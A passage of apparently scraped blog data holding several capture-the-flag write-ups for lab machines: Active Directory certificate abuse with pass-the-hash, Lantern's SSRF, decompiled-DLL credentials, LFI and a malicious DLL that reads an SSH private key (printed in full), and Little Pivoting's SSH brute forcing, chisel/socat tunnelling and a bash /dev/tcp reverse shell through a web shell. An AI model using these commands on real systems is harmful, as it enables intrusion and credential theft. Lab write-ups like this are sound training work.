(`3b181b914e7a9d5508ea1e20bc2b7fce`) to authenticate as the user `ca_svc` in the domain `sequel.htb`. > > - **Certificate request**: It requests a certificate from the Certification Authority (CA) `sequel-DC01-CA` using the certificate template `DunderMifflinAuthentication`. > > - **Certificate for the specified UPN**: The certificate is requested for the UPN `administrator@sequel.htb`, meaning the issued certificate will be associated with this user. > > - **Name resolution**: It uses the provided IP addresses (`10.10.11.51`) for name resolution (Name Server and DNS). > > - **Debug mode**: It provides detailed information about the command execution, which can be useful for troubleshooting or better understanding the process. **Authentication using a PFX file that contains a certificate.** ```bash sudo certipy-ad auth -pfx administrator_10.pfx -domain sequel.htb ``` ![Image](image-20.png) > - **Autenticación con certificado**: Utiliza el archivo PFX (`administrator_10.pfx`) para autenticarse en el dominio `sequel.htb`. El archivo PFX contiene un certificado y una clave privada, que se utilizan para demostrar la identidad del usuario. > > - **Obtención de un ticket de Kerberos**: Si la autenticación es exitosa, **Certipy** puede obtener un ticket de Kerberos (TGT, Ticket Granting Ticket) para el usuario asociado al certificado. Este ticket puede ser utilizado para acceder a recursos en el dominio. ```bash [*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff ``` ```bash evil-winrm -i 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff ``` ![Image](image-21.png) [DACL](https://www.thehacker.recipes/ad/movement/dacl/)"},{"id":"lantern","title":"HTB - Lantern","description":"HTB - Lantern","date":"2024-08-23T00:00:00.000Z","tags":["HackTheBox","SSRF","Skipper-Proxy","Blazer","API","Decompile","DLL","File-Disclosure","LFI","RCE","Procmon"],"authors":["r4cc0x"],"url":"/blog/lantern","content":"## Box Info | Name | Lantern | | :-------------------- | ---------------: | | Release Date | 23 Aug, 2024 | | OS | Windows | | Rated Difficulty | Hard | ```bash $ sudo nmap -p- --open --min-rate 5000 -n -sS -vvv 10.10.11.29 -oG allPorts [sudo] password for racc0x: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 13:25 EDT Initiating Ping Scan at 13:25 Scanning 10.10.11.29 [4 ports] Completed Ping Scan at 13:25, 0.09s elapsed (1 total hosts) Initiating SYN Stealth Scan at 13:25 Scanning 10.10.11.29 [65535 ports] Discovered open port 80/tcp on 10.10.11.29 Discovered open port 22/tcp on 10.10.11.29 Discovered open port 3000/tcp on 10.10.11.29 Completed SYN Stealth Scan at 13:25, 13.43s elapsed (65535 total ports) Nmap scan report for 10.10.11.29 Host is up, received echo-reply ttl 63 (0.17s latency). Scanned at 2024-08-20 13:25:24 EDT for 13s Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 3000/tcp open ppp syn-ack ttl 63 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA) |_ 256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519) 80/tcp open http Skipper Proxy |_http-title: Did not follow redirect to http://lantern.htb/ | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Not Found | Content-Length: 207 | Content-Type: text/html; charset=utf-8 | Date: Tue, 20 Aug 2024 17:26:17 GMT | Server: Skipper Proxy | | | 404 Not Found | Not Found | The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. | GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 302 Found | Content-Length: 225 | Content-Type: text/html; charset=utf-8 | Date: Tue, 20 Aug 2024 17:26:11 GMT | Location: http://lantern.htb/ | Server: Skipper Proxy | | | Redirecting... | Redirecting... | You should be redirected automatically to the target URL: http://lantern.htb/ . If not, click the link. | HTTPOptions: | HTTP/1.0 200 OK | Allow: GET, OPTIONS, HEAD | Content-Length: 0 | Content-Type: text/html; charset=utf-8 | Date: Tue, 20 Aug 2024 17:26:11 GMT |_ Server: Skipper Proxy |_http-server-header: Skipper Proxy 3000/tcp open ppp? | fingerprint-strings: | GetRequest: | HTTP/1.1 500 Internal Server Error | Connection: close | Content-Type: text/plain; charset=utf-8 | Date: Tue, 20 Aug 2024 17:26:16 GMT | Server: Kestrel | System.UriFormatException: Invalid URI: The hostname could not be parsed. | System.Uri.CreateThis(String uri, Boolean dontEscape, UriKind uriKind, UriCreationOptions& creationOptions) | System.Uri..ctor(String uriString, UriKind uriKind) | Microsoft.AspNetCore.Components.NavigationManager.set_BaseUri(String value) | Microsoft.AspNetCore.Components.NavigationManager.Initialize(String baseUri, String uri) | Microsoft.AspNetCore.Components.Server.Circuits.RemoteNavigationManager.Initialize(String baseUri, String uri) | Microsoft.AspNetCore.Mvc.ViewFeatures.StaticComponentRenderer. g__InitializeCore|5_0(HttpContext httpContext) | Microsoft.AspNetCore.Mvc.ViewFeatures.StaticC | HTTPOptions: | HTTP/1.1 200 OK | Content-Length: 0 | Connection: close | Date: Tue, 20 Aug 2024 17:26:21 GMT | Server: Kestrel | Help: | HTTP/1.1 400 Bad Request | Content-Length: 0 | Connection: close | Date: Tue, 20 Aug 2024 17:26:16 GMT | Server: Kestrel | RTSPRequest: | HTTP/1.1 505 HTTP Version Not Supported | Content-Length: 0 | Connection: close | Date: Tue, 20 Aug 2024 17:26:22 GMT | Server: Kestrel | SSLSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Length: 0 | Connection: close | Date: Tue, 20 Aug 2024 17:26:38 GMT |_ Server: Kestrel 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== ``` It is using an Ubuntu Jammy ![Image](1.png) **Web:** At the bottom of the page, we find that we can upload a PDF file. ![Image](2.png) ![Image](3.png) Web port 3000 Through port 3000, we have another page but for administrators ![Image](image.png) The web page is using blazor framework ![Image](image-1.png) Looking what it is blazor framework ![Image](image-2.png) http://lantern.htb:3000/Error ![Image](image-3.png) ```bash feroxbuster -u http://lantern.htb/ ``` ![Image](image-4.png) ## CVE-2022-38580 https://www.exploit-db.com/exploits/51111 [CVE-2022-38580](https://www.exploit-db.com/exploits/51111). ![Image](image-5.png) Skipper Proxy is an open-source HTTP proxy designed to manage and route web traffic. ![alt text](image-6.png) ## SSRF | Skipper Proxy X-Skipper-Proxy: http://127.0.0.1:5000/ X-Skipper-Proxy: http://127.0.0.1:3000/ ![alt text](image-7.png) We will target internal ports and see if we can get a response (200 OK). ![alt text](image-8.png) ### EndPoints ```js (function (l) { if (l.search[1] === '/') { var decoded = l.search.slice(1).split('&').map(function (s) { return s.replace(/~and~/g, '&') }).join('?'); window.history.replaceState(null, null, l.pathname.slice(0, -1) + decoded + l.hash ); } }(window.location)) var path = window.location.pathname.split('/'); var base = document.getElementsByTagName('base')[0]; if (window.location.host.includes('localhost')) { base.setAttribute('href', '/'); } else if (path.length > 2) { base.setAttribute('href', '/' + path[1] + '/'); } else if (path[path.length - 1].length != 0) { window.location.replace(window.location.origin + window.location.pathname + '/' + window.location.search); } Loading... An unhandled error has occurred. Reload 🗙 ``` ## Blazor Framework ```bash ``` Here we found another file interesting. view-source:http://lantern.htb:3000/_framework/ ![Image](image-10.png) view-source:http://lantern.htb:3000/_framework/blazor.server.js ![Image](image-9.png) ![Image](image-11.png) ```bash GET /_framework/blazor.server.js HTTP/1.1 Host: lantern.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Skipper-Proxy: http://127.0.0.1:3000 Referer: http://lantern.htb/vacancies Content-Type: multipart/form-data; boundary=---------------------------77018016341540896892659445340 Content-Length: 714 Origin: http://lantern.htb Connection: keep-alive ``` We filter by the blazor word for know if there exist another file interesting. ![Image](image-12.png) I found 2 routes, of which blazor.boot.json contains paths to DLL files. We will try to access them and find something interesting. `_framework/dotnet.wasm` `_framework/blazor.boot.json` ![Image](image-13.png) ## DLL Radzen.Blazor.dll InternaLantern.dll ![Image](image-14.png) ```bash GET /_framework/InternaLantern.dll HTTP/1.1 Host: lantern.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Skipper-Proxy: http://127.0.0.1:5000 Referer: http://lantern.htb/vacancies Content-Type: multipart/form-data; boundary=---------------------------77018016341540896892659445340 Content-Length: 714 Origin: http://lantern.htb Connection: keep-alive ``` For download the DLL's we can use curl: ```bash curl -X GET \"http://lantern.htb/_framework/InternaLantern.dll\" -H \"Host: lantern.htb\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\" -H \"X-Skipper-Proxy: http://127.0.0.1:5000\" -H \"Connection: close\" --output internalantern.dll ``` And for decompile DLL's we can use: **dnSpy** _Spoiler:_ We didn't get good results. **dotPeek** ```bash employee1.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String(\"SGVhZCBvZiBzYWxlcyBkZXBhcnRtZW50LCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBqb2huLnNAZXhhbXBsZS5jb20=\")); employee2.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String(\"SFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGFubnkudEBleGFtcGxlLmNvbQ==\")); employee3.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String(\"RnVsbFN0YWNrIGRldmVsb3BlciwgZW1lcmdlbmN5IGNvbnRhY3Q6ICs0NDEyMzQ1Njc4LCBlbWFpbDogY2F0aGVyaW5lLnJAZXhhbXBsZS5jb20=\")); employee4.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String(\"UFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGxhcmEuc0BleGFtcGxlLmNvbQ==\")); employee5.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String(\"SnVuaW9yIC5ORVQgZGV2ZWxvcGVyLCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBsaWxhLnNAZXhhbXBsZS5jb20=\")); employee6.InternalInfo = Encoding.UTF8.GetString(Convert.FromBase64String(\"U3lzdGVtIGFkbWluaXN0cmF0b3IsIEZpcnN0IGRheTogMjEvMS8yMDI0LCBJbml0aWFsIGNyZWRlbnRpYWxzIGFkbWluOkFKYkZBX1FAOTI1cDlhcCMyMi4gQXNrIHRvIGNoYW5nZSBhZnRlciBmaXJzdCBsb2dpbiE=\")); ``` Decode the string in base64 (_echo \"\" | base64 -d) - Head of sales department, emergency contact: +4412345678, email: john.s@example.com - HR, emergency contact: +4412345678, email: anny.t@example.com - FullStack developer, emergency contact: +4412345678, email: catherine.r@example.com - PR, emergency contact: +4412345678, email: lara.s@example.com - PR, emergency contact: +4412345678, email: lara.s@example.com - System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22 Ask to change after first login! Login lantern.htb:3000 with the credentials `admin:AJbFA_Q@925p9ap#22` ![Image](image-15.png) There is a section where we can upload DLL files; at this point, what comes to mind is a potential RCE. ![Image](image-16.png) ![Image](image-17.png) File Disclosure Vulnerability ![Image](image-18.png) ![Image](image-19.png) ## LFI ![Image](image-20.png) ```bash http://lantern.htb/PrivacyAndPolicy?lang=../../../../etc/resolv&ext=conf ``` ![Image](image-21.png) http://lantern.htb/PrivacyAndPolicy?lang=../../../../&ext=./etc/passwd ![Image](image-22.png) **User:** `tomas` ## RCE | Insecure Deserialization | Blazor Now we will intercept the request to see how it is sent to the server behind the scenes ![Image](image-28.png) It seems we can see the serialized information in JSON; to read it, we need to deserialize it. For that, we will use an extension in BurpSuite called BPB. ![Image](image-23.png) ![Image](image-24.png) We need to upload a DLL file and see what we can do with the deserialized data. Once we upload the file and deserialize it, we can see that we can insert the name of our file in the path to execute it. ### Deserialize ![Image](image-25.png) ### Serialize ![Image](image-26.png) Below you can see that can execute the test.dll file. ![Image](image-27.png) Now we a create and charge our dll file for show the id_rsa from user tomas. ```bash sudo apt install dotnet-sdk-6.0 mkdir xpl_project && \\ cd xpl_project && \\ dotnet new classlib -n xpl ``` ```powershell using Microsoft.AspNetCore.Components; using Microsoft.AspNetCore.Components.Rendering; using System.IO; namespace xpl { public class Component : ComponentBase { protected override void BuildRenderTree(RenderTreeBuilder builder) { base.BuildRenderTree(builder); // Read private SSH key of user tomas string file = File.ReadAllText(\"/home/tomas/.ssh/id_rsa\"); builder.AddContent(0, file); } } } ``` ```bash dotnet add package Microsoft.AspNetCore.Components --version 6.0.0 && \\ dotnet add package Microsoft.AspNetCore.Components.Web --version 6.0.0 dotnet build -c release We will find the xpl.dll file under path /xpl_project/xpl/bin/release/net6.0. ``` **We got the id_rsa:** ![Image](image-29.png) ``` -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- ``` `/var/mail$ cat tomas` ![Image](image-30.png) `sudo -l` ![Image](image-31.png) ## Procmon **-p/--pids:** This option allows us to specify a list of Process IDs (PIDs) that we want to monitor. We can provide multiple PIDs by separating them with commas. **-e/--events:** With this option, we can specify which system calls or events you want to monitor. Like the PIDs, these events can also be provided as a comma-separated list. **-c/--collect [FILEPATH]:** This option starts procmon in headless mode, meaning it will run without a user interface and will collect data directly into a specified file. This is useful for automated or script-based monitoring. **-f/--file FILEPATH:** This option allows us to open an existing procmon trace file. It’s useful when we want to analyze previously collected data rather than monitoring processes in real time. ![Image](proc1.png) `run command: `ps -aux` | `ps -aux | grep automation` for to display information about the currently running processes.` ![Image](proc2.png) Now we can see the write operations performed by the process with the follow command: `sudo /usr/bin/procmon -p [PID] -e write` Wait for a few minutes, long enough for the program to write sufficient data, Press F6 to export logs and F9 to exit: ![Image](proc3.png) ![Image](proc4.png) **Download db:** ```bash scp -i id_rsa tomas@lantern.htb:/home/tomas/procmon_2024- 08-23_00:50:02.db lantern.db ``` Open db with Sqlite3: `.tables` `SELECT * FROM ebpf;` ![Image](proc5.png) `.output out.txt` `SELECT hex(substr(arguments, 9, resultcode)) FROM ebpf WHERE resultcode > 0 ORDER BY timestamp;` **Hexadecimal format** [CyberChef](https://gchq.github.io/CyberChef/) ![Image](proc6.png) Or use this script for decode the hexadecimal format: ```python import binascii # Read the content from out.txt with open('out.txt', 'r') as file: hex_data = file.read().strip().replace('\\n', '') # Convert hex data to binary binary_data = binascii.unhexlify(hex_data) # Decode the binary data to a string try: decoded_string = binary_data.decode('utf-8', errors='replace') except UnicodeDecodeError: decoded_string = binary_data.decode('latin1', errors='replace') print(\"Decoded Data:\\n\") print(decoded_string) ``` ![Image](proc7.png) We need to delete the duplicate letters. ![Image](proc8.png) ![Image](proc9.png) Pwned!!"},{"id":"littlepivoting","title":"Docker Labs - Little Pivoting","description":"Docker Labs - Little Pivoting","date":"2024-08-23T00:00:00.000Z","tags":["DockerLabs","Pivoting","SSH-Brute-Force","Hydra","Sudoers","Chisel","Socat","Remote-Port-Forwarding","SUID","Abusing-File-Upload"],"authors":["r4cc0x"],"url":"/blog/littlepivoting","content":"## Box Info | Name | Little Pivoting | | :-------------------- | ---------------: | | Release Date | 19 April, 2024 | | OS | Linux | | Rated Difficulty | Medium | **Download lab here: https://dockerlabs.es/ # Network diagram ![Image](image.png) ## Nmap ```bash nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.10.2 -oG allports nmap -sCV -p 22,80 10.10.10.2 -oN targeted ``` ```bash # Nmap 7.94SVN scan initiated Fri Sep 20 19:00:41 2024 as: nmap -sCV -p 22,80 -oN targeted 10.10.10.2 Nmap scan report for 10.10.10.2 (10.10.10.2) Host is up (0.00015s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | ssh-hostkey: | 256 03:cf:72:54:de:54:ae:cd:2a:16:58:6b:8a:f5:52:dc (ECDSA) |_ 256 13:bb:c2:12:f5:97:30:a1:49:c7:f9:d0:ba:d0:5e:f7 (ED25519) 80/tcp open http Apache httpd 2.4.57 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.57 (Debian) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Sep 20 19:00:48 2024 -- 1 IP address (1 host up) scanned in 6.66 seconds ``` The first page we found a default page from Apache, I will use feroxbuster for directory scan for found some interesting. ```bash feroxbuster -u http://10.10.10.2/ ``` ![Image](image-1.png) http://10.10.10.2/shop/ ![Image](image-2.png) Its a variable of php, so that means we can use a Local File Inclusion with php. ![Image](image-3.png) ## LFI ```bash http://10.10.10.2/shop/index.php?archivo=/etc/passwd ``` ```bash http://10.10.10.2/shop/index.php?archivo=../../../../etc/passwd ``` _By adding 'index.php' at the end of the URL, the web server interprets that a PHP file in the root directory of the website is being accessed, and then the 'archivo' parameter is used to include the specified file in the URL._ ![Image](image-4.png) **We found 2 users:** seller:x:1000:1000:seller,,,:/home/seller:/bin/bash manchi:x:1001:1001:manchi,,,:/home/manchi:/bin/bash ### Brute Force Attack | SSH ```bash hydra -l manchi -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2 -t 4 ``` ![Image](image-5.png) ```bash > hostname -I ``` ![Image](image-6.png) The script scans for devices on the network 20.20.20.1 to 20.20.20.254 by pinging each IP address to find out which ones are active. ```bash #!/bin/bash for host in $(seq 1 254); do timeout 1 bash -c \"ping -c 1 20.20.20.$host &>/dev/null\" && echo \"[+] HOST - 20.20.20.$host\" done; wait ``` ![Image](image-7.png) ![Image](image-8.png) ## Pivoting | 20.20.20.0/24 #### manchi 1. Upload chisel to victim machine 2. Execute chisel in attack machine ```bash ./chisel server -p 6150 --reverse ``` ![Image](image-9.png) 3. Execute chisel in victim machine. As you can see, port `1080` is open by default in our machine. This port is crucial for the exchange of communications between 10.10.10.2 and our IP, {10.10.10.1}. ```bash ./chisel client {IP}:6150 R:socks ``` ![Image](image-10.png) 4. We just need to configure the proxychains. 4. 1. uncomment `dynamic_chain` and comment `strict_chain` ![Image](image-11.png) 4. 2. Comment socks4 and add socks5 127.0.0.1 1080 ![Image](image-12.png) ## Nmap | ProxyChains Specify ports 22 and 80 because they are the only ones that appeared in the initial scan. ```BASH sudo proxychains nmap -sCV -sT -Pn 22,80 20.20.20.3 2>&1 | grep -vE \"timeout|OK\" ``` ![Image](image-13.png) ### FoxyProxy We gonna add the socks to foxyproxy extension in firefox for see the web page of 20.20.20.3. ![Image](image-14.png) We have another default page from Apache 2. I guess we have to follow the same process as before. ![Image](image-15.png) ```bash feroxbuster -u http://20.20.20.3/ --proxy socks5://127.0.0.1:1080 ``` ```bash feroxbuster -u http://20.20.20.3/secret.php/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1080 -x php,html ``` ![Image](image-16.png) Possible user: **Mario** ## Remote Port Forwarding I suppose we have to do the brute force attack process again to get \"mario\" password, however we cannot specify a specific port for hydra, it has its own default port which is 22. Now we will bring port 22 from machine 20.20.20.3 to be our port 22, a remote port forwarding for attack the our port 22. We need to create a new login as manchi and run again the chisel. ```bash ./chisel client 10.10.10.1:6150 R:22:20.20.20.3:22 ``` ![Image](image-17.png) ```bash ./chisel server -p 6150 --reverse ``` ![Image](image-18.png) ```bash lsof -i:22 ``` ![Image](image-19.png) ## Brute Force Attack | 20.20.20.3 ### Mario ```bash hydra -l mario ssh://127.0.0.1 -P /usr/share/wordlists/rockyou.txt -t 4 ``` ![Image](image-20.png) ```bash proxychains ssh mario@20.20.20.3 ``` ![Image](image-21.png) `sudo -l` ![Image](image-22.png) [GTFO](https://gtfobins.github.io/gtfobins/vim/#shell) ```bash sudo vim -c ':!/bin/sh' ``` ![Image](image-23.png) Run againt the script. ![Image](image-24.png) ## Pivoting | 30.30.30.0/24 We send the chisel bin from 20.20.20.2(manchi) to 20.20.20.3(Mario). ![Image](image-25.png) ![Image](image-26.png) Now we will use **socat**, which will allow us, from the machine 30.30.30.2, to connect with chisel to the machine 20.20.20.2, and the machine 20.20.20.2 will redirect that connection to 10.10.10.1, which is us. https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat ![Image](image-27.png) ```bash manchi 20.20.20.2 ./socat TCP-LISTEN:1111,fork TCP:10.10.10.1:6150 ``` ![Image](image-28.png) 1. **Connection from 20.20.20.3 to 20.20.20.2**: The machine 20.20.20.3 connects to the compromised machine (20.20.20.2) on port 1111 using chisel and the fork option allows handling multiple connections simultaneously.. 2. **Redirection by socat**: When a connection is established on port 1111 of 20.20.20.2, socat redirects that connection to the machine 10.10.10.1 on port 6150. ```bash root 20.20.20.3 ./chisel client 20.20.20.2:1111 R:1111:socks ``` ![Image](image-29.png) 3. **Data flow**: This allows any traffic that arrives at port 1111 on 20.20.20.2 to be sent to 10.10.10.1:6150, and vice versa, enabling communication between 20.20.20.3 and 10.10.10.1 through the compromised machine. ![Image](image-30.png) ```java 2024/09/21 00:48:54 server: session#4: tun: proxy#R:127.0.0.1:1111=>socks: Listening ``` ### Nmap | 30.30.30.3 ```bash sudo proxychains nmap -sCV -sT -Pn -p 22,80 30.30.30.3 2>&1 | grep -vE \"timeout|OK\" ``` We have only port 80 open. ![Image](image-31.png) ## RCE config the foxyproxy for visualizer the web page ![Image](image-32.png) I will upload empty file for see if found some error when upload the empty file. ![Image](image-33.png) ```bash feroxbuster -u http://30.30.30.3/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1111 -x php,html,js,txt ``` ![Image](image-34.png) ```python ``` ![Image](image-35.png) For get a reverse shell we need to log in as mario. (proxychains ssh mario@20.20.20.3 | chocolate) ![Image](image-36.png) ![Image](image-37.png) ![Image](image-38.png) ```bash root 20.20.20.3 ./socat TCP-LISTEN:443,fork TCP:20.20.20.2:442 ``` ```bash manchi 20.20.20.2 ./socat TCP-LISTEN:442,fork TCP:10.10.10.1:441 ``` ![Image](image-39.png) ```python http://30.30.30.3/uploads/f.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/30.30.30.2/443+0%3E%261%27 ``` ![Image](image-40.png) ## Privilege Escalation | SUID ![Image](image-41.png) sudo -l ![Image](image-42.png) [GTFO-Env](https://ubh.natro92.fun/gtfobins/env/#sudo) sudo env /bin/bash ![Image](image-43.png) Pwned!"},{"id":"resource","title":"HTB - Resource","description":"HTB - Resource","date":"2024-08-23T00:00:00.000Z","tags":["HackTheBox","LFI","RCE","Lateral-movement","PrivEsc"],"authors":["r4cc0x"],"url":"/blog/resource","content":"## Box Info | Name | Resource | | :-------------------- | ---------------: | | Release Date | 3 Sep, 2024 | | OS | Linux | | Rated Difficulty | Medium | # Enumeration Exposed Services ping -c 3 10.10.11.27 ![Image](image.png) target OS : Linux ## Nmap ```bash sudo nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.27 -oG allports ``` ```bash Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 17:44 EDT Initiating SYN Stealth Scan at 17:44 Scanning 10.10.11.27 [65535 ports] Discovered open port 80/tcp on 10.10.11.27 Discovered open port 22/tcp on 10.10.11.27 Discovered open port 2222/tcp on 10.10.11.27 Completed SYN Stealth Scan at 17:44, 13.29s elapsed (65535 total ports) Nmap scan report for 10.10.11.27 Host is up, received user-set (0.15s latency). Scanned at 2024-09-17 17:44:44 EDT for 13s Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 62 80/tcp open http syn-ack ttl 63 2222/tcp open EtherNetIP-1 syn-ack ttl 63 Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds Raw packets sent: 65595 (2.886MB) | Rcvd: 65595 (2.624MB nmap -sCV -p 22,80,2222 10.10.11.27 -oN targeted # Nmap 7.94SVN scan initiated Tue Sep 17 17:45:51 2024 as: nmap -sCV -p 22,80,2222 -oN targeted 10.10.11.27 Nmap scan report for 10.10.11.27 (10.10.11.27) Host is up (0.088s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) | ssh-hostkey: | 256 78:1e:3b:85:12:64:a1:f6:df:52:41:ad:8f:52:97:c0 (ECDSA) |_ 256 